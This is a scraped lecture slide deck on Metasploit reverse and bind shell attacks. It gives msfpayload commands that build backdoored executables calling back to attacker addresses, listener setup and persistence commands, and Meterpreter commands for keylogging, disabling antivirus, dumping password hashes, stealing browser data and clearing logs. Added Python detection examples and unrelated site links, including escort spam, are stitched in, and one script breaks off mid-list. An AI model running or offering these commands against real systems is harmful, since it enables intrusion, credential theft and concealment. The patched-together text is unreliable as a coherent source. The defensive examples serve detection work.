Cyber Security & Ethical Hacking
By Mehedi Hasan
Lecture 16:
Reverse & Bind Shell Attacks
Meterpreter
Exploit:
An exploit is the process of taking advantage of a security loophole on the
victim's computer to gain illegal access.
Payloads:
A payload is the code that an attacker executes on the victim's
computer once the system has been compromised.
A reverse shell payload is an example.
Post Exploitation Attack:
Once a system has been compromised, the actions the attacker executes
against it to control it.
Listener:
A listener is code that runs on the attacker's computer and waits for an
incoming connection from the victim's computer.
Post Exploitation Attacks
Important Terminology
Shell
A shell is a command line interface on a system that allows a user to
interact with the system by sending it text commands, for example the
command prompt in Windows and the Terminal in Kali Linux.
Reverse Shell Attack
Reverse shell attacks are attacks that force the victim's computer to
connect back to the criminal and provide the criminal with remote shell
access to it.
Reverse shell attacks also have the additional advantage that they allow
the criminal to connect to the victim even if the victim is behind a
firewall or has an internal IP address. This is true since in a reverse
shell attack the connection is outgoing from the victim instead of
incoming to it.
Typically, in a reverse shell attack the criminal has to follow the steps
below.
Step 1: Infect a regular file with a payload (msf)
Step 2: Open a port on the criminal's computer and listen for any incoming
connections from the victim (msf)
Step 3: Send the infected file to the victim and somehow get them to
execute the file (social engineering)
Meterpreter
• Introduction: Meterpreter is a tool which is part of Metasploit and
allows the attacker to communicate with the victim's system after it has
been exploited. The best part about Meterpreter is that it runs from
memory by attaching itself to a process on the victim's computer and
does not create any file on it.
Post Exploitation Attacks
Meterpreter
Reverse Shell Access: Steps Involved
Step 1: Backdoor file
Backdoor a file and infect it with exploit code and a payload (exe, pdf,
doc, xls).
Step 2: Listener
Launch a listener on your computer.
Step 3: Exploitation
Send the infected file to the victim and somehow make them execute it.
Step 4: Shell Access
Wait for the remote shell connection to get established between victim
and attacker.
Step 5: Post Exploitation
Control the victim's computer with post exploitation scripts.
Meterpreter
Post Exploitation Attacks
Step 1: Backdoor file (msf)
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.15 LPORT=4444 X > /root/desktop/nfs.exe
Step 2: Listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.15
exploit
Step 3: Exploitation (Social Engineering)
Step 4: Shell Access
Get Meterpreter shell access.
Step 5: Post Exploitation.
Meterpreter
Post Exploitation Attacks
Different ways to get a Meterpreter session
• Send the victim the infected file.
• Send the victim an infected PDF (vulnerability in Adobe Acrobat on the
victim).
• Send the victim a link to a page that exploits a browser vulnerability.
• Send the victim a link to a webpage that exploits a Java vulnerability.
Remote Shell Attack
Using an infected exe file
Requirements
• Victim is running Windows 7
• Attacker has Metasploit.
Meterpreter
Post Exploitation Attacks
Step 1: Hide the reverse shell payload in, say, a game like NFS.exe. This
reverse shell payload, when executed on the victim's system, will connect
back to the attacker on port 4444 at the IP address 192.168.100.15.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.15 LPORT=4444 X > /root/desktop/nfs.exe
Step 2: Start Metasploit and type the following commands to launch the
multi handler module and tell it which payload to expect and on what port.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.15
set LPORT 4444
exploit
Step 3: Metasploit will now start the payload handler and wait for a
reverse shell connection to get established from the victim's machine to
the attacker's on port 4444.
Meterpreter
Post Exploitation Attacks
Step 4: Somehow send the nfs.exe file to the victim and fool the victim
into executing it on the Windows 7 system.
Step 5: You have now successfully managed to connect to the victim's
computer and a Meterpreter session has been created between attacker and
victim. To double check, type the sysinfo command.
Step 6: To get access to the shell prompt on the victim's computer, simply
type the shell command: shell
Step 7: You can now browse the victim's computer just as if it were your
own computer.
Post Exploitation Scripts
List of existing scripts available:
http://dev.metasploit.com/redmine/projects/framework/repository/shell-script/metrepreter
Meterpreter existing scripts
List the scripts shipped with the framework:
cd /pentest/exploits/framework/scripts/meterpreter
dir
Display interface information of the victim's computer: ipconfig
Display system information of the victim's computer: sysinfo
Take a picture using the victim's webcam (first list the cameras): webcam_list
Take a screenshot of the victim's screen: screenshot
Display the list of processes running on the victim's computer: ps
Migrate to some other process: migrate 912
Migrates to the process whose PID is 912, in this case explorer.exe. Now
you can capture the victim's keystrokes.
Start a keylogger on the victim's computer:
run post/windows/capture/keylog_recorder
Starts a keylogger on the victim's system and records all keystrokes.
Start a keylogger on the victim's computer (built-in commands):
keyscan_start
keyscan_dump
keyscan_stop
Starts the keylogger on the victim's computer, dumps the keylogger buffer
and then stops the keylogger.
Shut down or reboot the victim's computer:
shutdown
reboot
Kill the antivirus on the victim's computer: run killav
Privilege escalation on the victim's system:
getsystem
Tries privilege escalation to give you admin rights on the victim's system.
getuid
Tells you which user you are currently logged in as on the victim's system.
Remotely modify the victim's registry: reg
Dump the password hashes: run hashdump
Steal password hashes: getsystem, then run hashdump
Take over the victim's computer: run scraper
Allows you to download all sorts of information from the victim's computer.
Interactive remote GUI access to the victim: run vnc
Control the mouse/keyboard of the victim: uictl -h,
uictl disable mouse, uictl enable mouse
Erase the victim's log files: clearev
Erase the victim's log files: run event_manager -h
Post exploitation modules
View the list of Wi-Fi networks: run post/windows/wlan/wlan_bss_list
Get all stored Wi-Fi profiles: run post/windows/wlan/wlan_profile
View the victim's USB history: run post/windows/gather/usb_history
Get shortcuts from the victim: run post/windows/gather/dumplinks
Steal saved Picasa passwords:
run post/windows/gather/credentials/enum_picasa_pwds
Steal browser history, cookies, login data, bookmarks and preferences:
run post/windows/gather/enum_chrome
Steal the victim's Microsoft product keys:
run post/windows/gather/enum_ms_product_keys
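Two of the actions in the list above leave traces a defender can look for in the Windows event logs: dropping into a shell from a compromised user application (the "shell" command) shows up as a process-creation event whose parent is a document viewer or game, and clearev shows up as a log-cleared event. The Python below is an added example, not part of the lecture; it triages constructed event records using the standard Windows event IDs (4688 process creation, 1102 Security log cleared, 104 System log cleared). The record field names are simplified, and the list of parent applications is an assumption to tune per environment.

```python
"""Triage constructed Windows event records for two post-exploitation
behaviours listed above: a shell spawned from a user application (the
"shell" command) and event logs being cleared (clearev).

Added example; it is not part of the original lecture. The event IDs are
the standard Windows ones (4688 process creation, 1102 Security log
cleared, 104 System log cleared); the records are constructed and the
parent-process list is an assumption to tune per environment.
"""
from typing import Dict, List, Optional, Tuple

SHELLS = {"cmd.exe", "powershell.exe"}
# Assumed: user-facing applications with no business launching a shell.
SUSPICIOUS_PARENTS = {"acrord32.exe", "winword.exe", "excel.exe", "java.exe", "nfs.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict) -> Optional[str]:
    """Return a finding for one event record, or None if it looks benign."""
    eid = ev["event_id"]
    if ev["channel"] == "Security" and eid == 1102:
        return f"Security event log cleared by {ev['user']}"
    if ev["channel"] == "System" and eid == 104:
        return f"System event log cleared by {ev['user']}"
    if ev["channel"] == "Security" and eid == 4688:
        child = basename(ev["new_process"])
        parent = basename(ev["parent_process"])
        if child in SHELLS and parent in SUSPICIOUS_PARENTS:
            return f"{parent} spawned {child} (pid {ev['pid']}) as {ev['user']}"
    return None


def triage(events: List[Dict]) -> List[Tuple[str, str]]:
    findings = []
    for ev in events:
        msg = check_event(ev)
        if msg is not None:
            findings.append((ev["time"], msg))
    return findings


# Constructed sample records; field names are simplified versions of the
# 4688 / 1102 / 104 event data.
SAMPLE_EVENTS = [
    {"time": "10:02:11", "channel": "Security", "event_id": 4688, "user": "alice",
     "new_process": r"C:\Program Files\Google\Chrome\chrome.exe",
     "parent_process": r"C:\Windows\explorer.exe", "pid": 1320},
    {"time": "10:05:40", "channel": "Security", "event_id": 4688, "user": "alice",
     "new_process": r"C:\Windows\System32\cmd.exe",
     "parent_process": r"C:\Users\alice\Downloads\nfs.exe", "pid": 2104},
    # A user opening cmd.exe from the desktop is normal and is not flagged.
    {"time": "10:06:02", "channel": "Security", "event_id": 4688, "user": "alice",
     "new_process": r"C:\Windows\System32\cmd.exe",
     "parent_process": r"C:\Windows\explorer.exe", "pid": 2188},
    {"time": "10:31:17", "channel": "Security", "event_id": 1102, "user": "alice"},
    {"time": "10:31:18", "channel": "System", "event_id": 104, "user": "alice"},
]

if __name__ == "__main__":
    for when, msg in triage(SAMPLE_EVENTS):
        print(when, msg)
```

The log-cleared events are the ones worth forwarding off-host, since once clearev has run they are the only record left locally of what happened before it.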
Remote Shell Attack
Once you have successfully got shell access to the victim's computer,
ideally you want to leave a backdoor open, such that you will have easy
access to it in the future as well.
Meterpreter has a persistence.rb script that launches a Meterpreter
service on the victim's computer, such that the attacker will be able to
access the victim's computer even after it has been rebooted.
Once you have Meterpreter shell access on the victim, just type the
commands below.
run persistence -h
Displays all the various options available.
run persistence -U -i 5 -p 443 -r 192.168.100.1
Now even when the victim shuts down the computer, whenever the victim
turns it on again you will have Meterpreter shell access to the victim.
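Anything that survives a reboot has to be registered somewhere the operating system starts things from, which is where a defender looks for it. The Python below is an added example (not the lecture's or Metasploit's code): the lecture only says the persistence script keeps Meterpreter alive across reboots, so the check assumes the foothold is registered through a common autostart location (a Run key or a scheduled task) and flags entries that launch from temp or other user-writable directories, or that hand a script file to a script host. The entries are constructed sample data.

```python
"""Audit autostart entries for the kind of reboot-surviving foothold the
persistence script above creates.

Added example; not the lecture's or Metasploit's code. Assumes the foothold
is registered through a Run key or scheduled task and flags entries that
launch from temp or user-writable directories or hand a script file to a
script host. The entries below are constructed sample data.
"""
import re
from typing import Dict, List, Tuple

# Assumed: interpreters an autorun entry should rarely need.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
SCRIPT_EXT_RE = re.compile(r"\.(vbs|js|ps1|bat|hta)\b", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\users\\public\\|\\programdata\\", re.IGNORECASE)


def launched_exe(command: str) -> str:
    """Executable name from an autorun command line (handles quoted paths)."""
    command = command.strip()
    if command.startswith('"'):
        path = command[1:command.find('"', 1)]
    else:
        path = command.split(" ", 1)[0]
    return path.rsplit("\\", 1)[-1].lower()


def reasons_for(entry: Dict) -> List[str]:
    """Why an autostart entry deserves a look; empty list means it looks fine."""
    cmd = entry["command"]
    exe = launched_exe(cmd)
    reasons = []
    if TEMP_DIR_RE.search(cmd):
        reasons.append("launches from a temp directory")
    elif USER_WRITABLE_RE.search(cmd):
        reasons.append("launches from a user-writable directory")
    if exe in SCRIPT_HOSTS and SCRIPT_EXT_RE.search(cmd):
        reasons.append(f"{exe} runs a script file")
    return reasons


def audit(entries: List[Dict]) -> List[Tuple[str, str, List[str]]]:
    out = []
    for e in entries:
        r = reasons_for(e)
        if r:
            out.append((e["location"], e["name"], r))
    return out


# Constructed sample: two legitimate entries and two that warrant attention.
SAMPLE_ENTRIES = [
    {"location": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "OneDrive",
     "command": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"location": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "XyZabcQ",
     "command": r"C:\Windows\System32\wscript.exe //B //NoLogo C:\Users\alice\AppData\Local\Temp\XyZabcQ.vbs"},
    {"location": "Task Scheduler", "name": "Adobe Acrobat Update Task",
     "command": r'"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"'},
    {"location": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "name": "Updater",
     "command": r"C:\Users\Public\svc.exe -service"},
]

if __name__ == "__main__":
    for location, name, reasons in audit(SAMPLE_ENTRIES):
        print(f"{location}\\{name}: {'; '.join(reasons)}")
```

On a real host the entries would come from the Run keys and the task scheduler rather than a list; the heuristics stay the same, and a random-looking value name like the second one is a further hint worth adding.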
Bind Shell Attack
Bind Shell vs Reverse Shell
Bind Shell: It is possible to bind an application to a particular port in
such a way that whenever a user connects to that port, the user gets shell
access to the victim.
Reverse Shell: It is possible to create a payload in such a way that, when
executed on the victim, it connects to the attacker and gives shell access.
Bind Shell: The attacker has to connect to the victim on the specified port
to get access to the shell.
Reverse Shell: The victim connects back to the attacker, giving the attacker
a reverse shell.
Bind Shell: Easy to detect by a firewall.
Reverse Shell: Difficult to detect by a firewall.
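The firewall row of the comparison above, and the earlier point that a reverse shell is an outgoing connection from the victim, are what a defender can act on: a bind shell opens a new listening port that an inbound rule can block, while a reverse shell hides inside outbound traffic and has to be caught on the host by looking at which process holds the socket. The Python below is an added example, not part of the lecture; it classifies constructed netstat-like connection records from a victim host into the two shapes. The process and port allow-lists are assumptions a defender would tune for their own environment.

```python
"""Classify host connection records by the two shapes compared above.

Added example for the bind shell vs reverse shell comparison; it is not
part of the original lecture. The records are constructed sample data in
a netstat-like shape, and the allow-lists are assumptions a defender
would tune for their own environment.
"""
from dataclasses import dataclass
from typing import List, Optional

# Assumed: shells and interpreters, which rarely have a legitimate reason
# to hold a network socket on a workstation.
SHELL_PROCESSES = {"cmd.exe", "powershell.exe", "sh", "bash"}
# Assumed: processes expected to make outbound connections.
KNOWN_NETWORK_CLIENTS = {"chrome.exe", "firefox.exe", "svchost.exe", "outlook.exe"}
# Assumed: listening ports a workstation is expected to expose.
EXPECTED_LISTEN_PORTS = {135, 139, 445}
# Assumed: remote ports that client software commonly talks to.
COMMON_OUTBOUND_PORTS = {53, 80, 443}


@dataclass
class Conn:
    local: str    # "ip:port"
    remote: str   # "ip:port"; "0.0.0.0:0" for a listener
    state: str    # "LISTEN" or "ESTABLISHED"
    pid: int
    process: str


@dataclass
class Finding:
    pid: int
    process: str
    shape: str          # "bind-shell-like" or "reverse-shell-like"
    firewall_view: str  # what a perimeter firewall would see
    reason: str


def port_of(addr: str) -> int:
    return int(addr.rsplit(":", 1)[1])


def classify(c: Conn) -> Optional[Finding]:
    """Return a Finding for a suspicious record, or None for a benign one."""
    if c.state == "LISTEN":
        port = port_of(c.local)
        # Bind-shell shape: an unexpected process opens a new listening port,
        # which the attacker must then reach with an inbound connection.
        if port not in EXPECTED_LISTEN_PORTS and c.process not in KNOWN_NETWORK_CLIENTS:
            return Finding(c.pid, c.process, "bind-shell-like",
                           "inbound connection to a new listening port (usually blocked)",
                           f"unexpected listener on port {port}")
        return None
    if c.state == "ESTABLISHED":
        # Reverse-shell shape: the victim connects out, so the firewall sees
        # ordinary outbound traffic; the host-side telltale is the process.
        if c.process in SHELL_PROCESSES:
            return Finding(c.pid, c.process, "reverse-shell-like",
                           "outbound connection (usually allowed)",
                           f"shell process holds a socket to {c.remote}")
        if port_of(c.remote) not in COMMON_OUTBOUND_PORTS and c.process not in KNOWN_NETWORK_CLIENTS:
            return Finding(c.pid, c.process, "reverse-shell-like",
                           "outbound connection (usually allowed)",
                           f"unusual process connected out to {c.remote}")
    return None


def triage(conns: List[Conn]) -> List[Finding]:
    return [f for f in map(classify, conns) if f is not None]


# Constructed sample: a victim workstation at 192.168.100.20, reusing the
# lecture's attacker addresses and ports as the suspicious endpoints.
SAMPLE_CONNS = [
    Conn("192.168.100.20:49201", "192.168.100.15:4444", "ESTABLISHED", 1844, "nfs.exe"),
    Conn("0.0.0.0:666", "0.0.0.0:0", "LISTEN", 2210, "bind.exe"),
    Conn("192.168.100.20:49188", "203.0.113.10:443", "ESTABLISHED", 1320, "chrome.exe"),
    Conn("0.0.0.0:445", "0.0.0.0:0", "LISTEN", 4, "System"),
    # Port 443 alone looks benign; the shell process is what gives it away.
    Conn("192.168.100.20:49310", "192.168.100.1:443", "ESTABLISHED", 3001, "cmd.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_CONNS):
        print(f"{f.shape:18} pid={f.pid:<5} {f.process:12} {f.reason} [{f.firewall_view}]")
```

The last sample record is the important one: the persistence example on this page calls back on port 443, so a port-only rule at the perimeter sees nothing, and only the process-to-socket mapping on the host separates it from a browser.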
Meterpreter
Bind Shell Access: Steps Involved
Step 1: Backdoor file
Backdoor a file and infect it with exploit code and a payload (exe, pdf,
doc, xls).
Step 2: Exploitation
Send the infected file to the victim and somehow make them execute it.
Step 3: Listener
The exploit binds itself to a particular port on the victim and listens
for a connection from the attacker.
Step 4: Shell Access
The attacker connects to the victim on the exploited port.
Step 5: Post Exploitation
Control the victim's computer with post exploitation scripts and commands.
MSFPAYLOAD
msfpayload -l
Displays a list of payloads that can be used to backdoor a file.
MSFPAYLOAD
It is possible to create payloads for both reverse and bind shell attacks.
Backdooring an EXE file with a payload
It is possible to backdoor an EXE file with a payload (reverse or bind
shell) with the help of msfpayload:
msfpayload <payload> LHOST=<ip> LPORT=<port> X > <output file name>
For example:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.12 LPORT=4444 X > /root/desktop/NFS.exe
Create Bind Shell
msfpayload windows/meterpreter/bind_tcp LHOST=192.168.100.13 LPORT=666 X > /root/desktop/bind.exe
Thank You

What Are The Drone Anti-jamming Systems Technology?
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 

Cyber Security and Ethical hacking 16

  • 1. Cyber Security & Ethical Hacking By Mehedi Hasan Lecture 16: Reverse & Bind Shell Attacks
  • 2. Meterpreter: Important Terminology (Post Exploitation Attacks)
    Exploit: An exploit is the process of taking advantage of a security loophole on the victim's computer to gain illegal access.
    Payload: A payload is the code that an attacker executes on the victim's computer once the system has been compromised. A reverse shell payload is an example.
    Post Exploitation Attack: Once a system has been compromised, the attacker runs post-exploitation scripts against it to control it.
    Listener: A listener is code that runs on the attacker's computer and waits for an incoming connection from the victim's computer.
  • 3. Shell
    A shell is a command line interface on a system that allows a user to interact with the system by sending it text commands, for example the Command Prompt in Windows and the Terminal in Kali Linux.
  • 4. Reverse Shell Attack
    Reverse shell attacks are attacks that force the victim's computer to connect back to the criminal and provide the criminal with remote shell access to it.
    Reverse shell attacks also have the additional advantage that they allow the criminal to connect to the victim even if the victim is behind a firewall or has an internal IP address. This is true since, in the case of a reverse shell attack, it is an outgoing connection instead of an incoming connection.
    Typically, in a reverse shell attack, the criminal has to follow the steps below.
    Step 1: Infect a regular file with a payload (msf)
    Step 2: Open a port on the criminal's computer and listen for any incoming connections from the victim (msf)
    Step 3: Send the infected file to the victim and somehow get them to execute the file (Social Engineering)
  • 5. Meterpreter (Post Exploitation Attacks)
    • Introduction: Meterpreter is a tool which is part of Metasploit and allows the attacker to communicate with the victim's system after it has been exploited. The best part about Meterpreter is that it runs from memory by attaching itself to a process on the victim's computer and does not create any file on it.
  • 6. Meterpreter Reverse Shell Access: Steps Involved
    Step 1: Backdoor file. Backdoor a file and infect it with exploit code and payload (exe, pdf, doc, xls).
    Step 2: Listener. Launch a listener on your computer.
    Step 3: Exploitation. Send the infected file to the victim and somehow make them execute it.
    Step 4: Shell Access. Wait for the remote shell connection to be established between victim and attacker.
    Step 5: Post Exploitation. Control the victim's computer with post-exploitation scripts.
  • 7. Meterpreter Post Exploitation Attacks
    Step 1: Backdoor file (msf): msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.15, LPORT=4444 >/root/desktop/nfs.exe
    Step 2: Listener: use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST=192.168.100.15; exploit
    Step 3: Exploitation (Social Engineering)
    Step 4: Shell Access: get Meterpreter shell access
    Step 5: Post Exploitation
  • 8. Meterpreter Post Exploitation Attacks: Different ways to get a Meterpreter session
    • Send the victim the infected file.
    • Send the victim an infected PDF (a vulnerability in Adobe Acrobat on the victim).
    • Send the victim a link to a page that exploits a browser vulnerability.
    • Send the victim a link to a web page that exploits a Java vulnerability.
  • 9. Remote Shell Attack using an infected exe file. Requirements:
    • Victim is running Windows 7
    • Attacker has Metasploit.
  • 10. Meterpreter Post Exploitation Attacks
    Step 1: Hide the reverse shell payload in, say, a game like NFS.exe. This reverse shell payload, when executed on the victim's system, will connect back to the attacker on port 4444 at IP address 192.168.100.15: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.15, LPORT=4444, >root/desktop/nfs.exe
    Step 2: Start Metasploit and type the following commands to launch the multi handler module and tell it which payload to expect and on what port: use exploit/multi/handler/reverse_tcp; set lhost 192.168.100.15
    Step 3: Metasploit will now start the payload handler and wait for a reverse shell connection to be established from the victim's machine to the attacker's on port 4444.
  • 11. Meterpreter Post Exploitation Attacks
    Step 4: Somehow send the nfs.exe file to the victim and fool the victim into executing it on the Windows 7 system.
    Step 5: You have now successfully connected to the victim's computer, and a Meterpreter session has been created between attacker and victim. To double check, type the sysinfo command.
    Step 6: To get access to the shell prompt on the victim's computer, simply type the shell command: shell
    Step 7: You can now browse the victim's computer just as if it were your own computer.
  • 12. Post Exploitation Scripts. List of existing scripts available: http://dev.metasploit.com/redmine/projects/framework/repository/shell-script/metrepreter
  • 14. Meterpreter existing script: Display interface information of the victim's computer: ipconfig
  • 15. Meterpreter existing script: Display system information of the victim's computer: sysinfo
  • 16. Meterpreter existing script: Take a picture using the victim's webcam: webcam_list
  • 17. Meterpreter existing script: Take a screenshot of the victim's webcam: screenshot
  • 18. Meterpreter existing script: Display the list of processes running on the victim's computer: ps
  • 19. Meterpreter existing script: Migrating to some other process: migrate 912. Migrates to the process whose process ID is 912, in this case explorer.exe. Now you can capture the victim's keystrokes.
  • 20. Meterpreter existing script: Start a keylogger on the victim's computer: run post/windows/capture/keylog_recorder. Starts a keylogger on the victim's system and records all keystrokes.
  • 21. Meterpreter existing script: Start a keylogger on the victim's computer: keyscan_start, keyscan_dump, keyscan_stop. Starts the keylogger on the victim's computer, dumps the keylogger buffer and then stops the keylogger.
  • 22. Meterpreter existing script: Shut down or reboot the victim's computer: shutdown, reboot
  • 23. Meterpreter existing script: Kill the antivirus on the victim's computer: run killav
  • 24. Meterpreter existing script: Privilege escalation on the victim's system: getsystem tries privilege escalation to give you admin rights on the victim's system; getuid tells you which user you are currently logged in as on the victim's system.
  • 25. Meterpreter existing script: Remotely modify the victim's registry: reg
  • 26. Meterpreter existing script: Dump the password hashes: run hashdump
  • 27. Meterpreter existing script: Steal password hashes: getsystem, run hashdump
  • 28. Meterpreter existing script: Take over the victim's computer: run scraper. Allows you to download all sorts of information from the victim's computer.
  • 29. Meterpreter existing script: Interactive remote GUI access to the victim: run vnc
  • 30. Meterpreter existing script: Control the mouse/keyboard of the victim: uictl -h, uictl disable mouse, uictl enable mouse.
  • 31. Meterpreter existing script: Erase the log files of the victim: clearev
  • 32. Meterpreter existing script: Erase the log files of the victim: run event_manager -h
  • 33. Meterpreter existing script: Post exploitation modules
  • 34. Meterpreter existing script: View the list of Wi-Fi networks: run post/windows/wlan/wlan_bss_list
  • 35. Meterpreter existing script: Get all stored Wi-Fi profiles: run post/windows/wlan/wlan_profile
  • 36. Meterpreter existing script: View the USB history of the victim: run post/windows/gather/usb_history
  • 37. Meterpreter existing script: Get shortcuts from the victim: run post/windows/gather/dumplinks
  • 38. Meterpreter existing script: Steal saved Picasa passwords: run post/windows/gather/credentials/enum_picasa_pwds
  • 39. Meterpreter existing script: Steal browser history, cookies, login data, bookmarks and preferences: run post/windows/gather/enum_chrome
  • 40. Meterpreter existing script: Steal Microsoft product keys of the victim: run post/windows/gather/enum_ms_product_keys
  • 41. Remote Shell Attack
    Once you have successfully got shell access to the victim's computer, ideally you want to leave a backdoor open so that you will have easy access to it in the future as well. Meterpreter has a persistence.rb script that launches a Meterpreter service on the victim's computer, such that the attacker will be able to access the victim's computer even after it has been rebooted. Once you have Meterpreter shell access on the victim, just type the commands below.
    persistence -h: Display all the various options available.
    persistence -u -i5 -p 443 -r 192.168.100.1
    Now even when the victim shuts down the computer, whenever the victim turns it on again you will have Meterpreter shell access to the victim.
  • 43. Bind Shell VS Reverse Shell
    Bind Shell: It is possible to bind an application to a particular port in such a way that whenever a user connects to that port, the user gets shell access to the victim.
    Reverse Shell: It is possible to create a payload in such a way that, when executed on the victim, it will connect to the attacker and give shell access.
    Bind Shell: The attacker has to connect to the victim on the specified port to get access to the shell.
    Reverse Shell: The victim connects back to the attacker, giving the attacker a reverse shell.
    Bind Shell: Easy to detect by a firewall.
    Reverse Shell: Difficult to detect by a firewall.
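The comparison above comes down to direction: a bind shell leaves a listening port on the victim, a reverse shell dials out past inbound firewall rules. As an added example that is not part of the lecture, the following Python triage turns that difference into a host-side check over netstat-style socket records; the allow-lists, process names and records are constructed assumptions, while the handler ports and the nfs.exe/bind.exe names come from the slides.

```python
# Added example (not the lecture's code): host-side triage of netstat-style socket
# records for the bind-shell and reverse-shell patterns the slides compare.
# All records are constructed; the allow-lists are assumptions to tune per host.
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass(frozen=True)
class Conn:
    pid: int
    process: str
    state: str        # "LISTEN" or "ESTABLISHED"
    lport: int
    raddr: str = ""   # empty for a listening socket
    rport: int = 0

# Assumed baseline for a plain workstation: who may listen, who may dial out.
EXPECTED_LISTENERS = {"System", "svchost.exe", "lsass.exe"}
EXPECTED_CLIENTS = {"chrome.exe", "outlook.exe", "svchost.exe"}
# Handler ports used by the lecture's payload examples (LPORT=4444, LPORT=666).
LECTURE_HANDLER_PORTS = {4444, 666}

def classify(c: Conn) -> Optional[str]:
    """Return a reason when the record matches a shell indicator, else None."""
    if c.state == "LISTEN" and c.process not in EXPECTED_LISTENERS:
        # Bind shell: the payload opens a port on the victim and waits, so a
        # listener owned by a process that never listens is the tell.
        return "unexpected listening socket (bind-shell pattern)"
    if c.state == "ESTABLISHED":
        # Reverse shell: the victim dials out, so inbound firewall rules never
        # see it; judge by which process made the connection and to which port.
        if c.rport in LECTURE_HANDLER_PORTS:
            return "outbound to known handler port (reverse-shell pattern)"
        if c.process not in EXPECTED_CLIENTS:
            # Also catches a migrated or persisted session: explorer.exe or a
            # game binary holding a connection to port 443 has no reason to.
            return "outbound from non-network process (reverse-shell pattern)"
    return None

def triage(conns: List[Conn]) -> List[Tuple[int, str, str]]:
    """Run classify() over every record; return (pid, process, reason) hits."""
    hits = [(c.pid, c.process, classify(c)) for c in conns]
    return [h for h in hits if h[2] is not None]

# Constructed sample: normal sockets plus two planted sessions and a persisted one.
SAMPLE = [
    Conn(4, "System", "LISTEN", 445),
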